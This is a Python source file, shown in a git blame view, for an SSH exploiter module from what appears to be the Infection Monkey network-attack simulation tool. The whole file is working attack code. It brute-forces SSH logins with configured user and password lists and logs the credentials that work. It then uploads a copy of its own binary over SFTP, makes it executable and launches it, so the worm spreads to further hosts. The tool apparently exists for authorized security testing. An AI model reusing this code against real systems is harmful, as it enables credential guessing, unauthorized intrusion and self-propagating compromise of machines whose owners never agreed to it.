monkey/chaos_monkey/exploit/sshexec.py

139 lines
5.0 KiB
Python
Raw Normal View History

import paramiko
import logging
import time
from itertools import product
import monkeyfs
2016-08-20 22:03:49 +08:00
from tools import build_monkey_commandline, report_failed_login
2015-11-30 20:11:19 +08:00
from exploit import HostExploiter
from model import MONKEY_ARG
from exploit.tools import get_target_monkey
from network.tools import check_port_tcp
__author__ = 'hoffer'
LOG = logging.getLogger(__name__)
2015-09-30 20:05:30 +08:00
SSH_PORT = 22
TRANSFER_UPDATE_RATE = 15
2015-11-30 16:56:20 +08:00
class SSHExploiter(HostExploiter):
_target_os_type = ['linux', None]
def __init__(self):
self._config = __import__('config').WormConfiguration
self._update_timestamp = 0
def log_transfer(self, transferred, total):
if time.time() - self._update_timestamp > TRANSFER_UPDATE_RATE:
LOG.debug("SFTP transferred: %d bytes, total: %d bytes", transferred, total)
self._update_timestamp = time.time()
2015-12-08 01:08:15 +08:00
def exploit_host(self, host, depth=-1, src_path=None):
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.WarningPolicy())
2015-09-30 20:05:30 +08:00
port = SSH_PORT
2015-10-12 22:42:54 +08:00
# if ssh banner found on different port, use that port.
2015-11-30 16:56:20 +08:00
for servkey, servdata in host.services.items():
2015-09-30 20:05:30 +08:00
if servdata.get('name') == 'ssh' and servkey.startswith('tcp-'):
2015-11-30 20:11:19 +08:00
port = int(servkey.replace('tcp-', ''))
2015-09-30 20:05:30 +08:00
2015-11-30 20:11:19 +08:00
is_open, _ = check_port_tcp(host.ip_addr, port)
2015-09-30 20:05:30 +08:00
if not is_open:
LOG.info("SSH port is closed on %r, skipping", host)
return False
passwords = list(self._config.ssh_passwords[:])
users = list(self._config.ssh_users)
known_passwords = [host.get_credentials(x) for x in users]
if len(known_passwords) > 0:
for known_pass in known_passwords:
if known_pass in passwords:
passwords.remove(known_pass)
passwords.insert(0, known_pass) #try first
user_pass = product(users,passwords)
exploited = False
for user, curpass in user_pass:
try:
ssh.connect(host.ip_addr,
username=user,
password=curpass,
port=port,
timeout=None)
LOG.debug("Successfully logged in %r using SSH (%s : %s)",
host, user, curpass)
host.learn_credentials(user, curpass)
exploited = True
break
except Exception, exc:
LOG.debug("Error logging into victim %r with user"
" %s and password '%s': (%s)", host,
user, curpass, exc)
2016-08-20 22:03:49 +08:00
report_failed_login(self, host, user, curpass)
continue
if not exploited:
LOG.debug("Exploiter SSHExploiter is giving up...")
return False
if not host.os.get('type'):
try:
_, stdout, _ = ssh.exec_command('uname -o')
uname_os = stdout.read().lower().strip()
if 'linux' in uname_os:
host.os['type'] = 'linux'
else:
LOG.info("SSH Skipping unknown os: %s", uname_os)
return False
except Exception, exc:
LOG.debug("Error running uname os commad on victim %r: (%s)", host, exc)
return False
if not host.os.get('machine'):
try:
_, stdout, _ = ssh.exec_command('uname -m')
uname_machine = stdout.read().lower().strip()
if '' != uname_machine:
host.os['machine'] = uname_machine
except Exception, exc:
LOG.debug("Error running uname machine commad on victim %r: (%s)", host, exc)
src_path = src_path or get_target_monkey(host)
if not src_path:
LOG.info("Can't find suitable monkey executable for host %r", host)
return False
try:
ftp = ssh.open_sftp()
self._update_timestamp = time.time()
with monkeyfs.open(src_path) as file_obj:
2015-11-30 20:11:19 +08:00
ftp.putfo(file_obj, self._config.dropper_target_path_linux, file_size=monkeyfs.getsize(src_path),
callback=self.log_transfer)
ftp.chmod(self._config.dropper_target_path_linux, 0777)
ftp.close()
except Exception, exc:
LOG.debug("Error uploading file into victim %r: (%s)", host, exc)
return False
try:
cmdline = "%s %s" % (self._config.dropper_target_path_linux, MONKEY_ARG)
2016-07-26 23:52:58 +08:00
cmdline += build_monkey_commandline(host, depth-1)
cmdline += "&"
ssh.exec_command(cmdline)
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
2015-11-30 16:56:20 +08:00
self._config.dropper_target_path_linux, host, cmdline)
ssh.close()
return True
except Exception, exc:
LOG.debug("Error running monkey on victim %r: (%s)", host, exc)
2015-11-30 16:56:20 +08:00
return False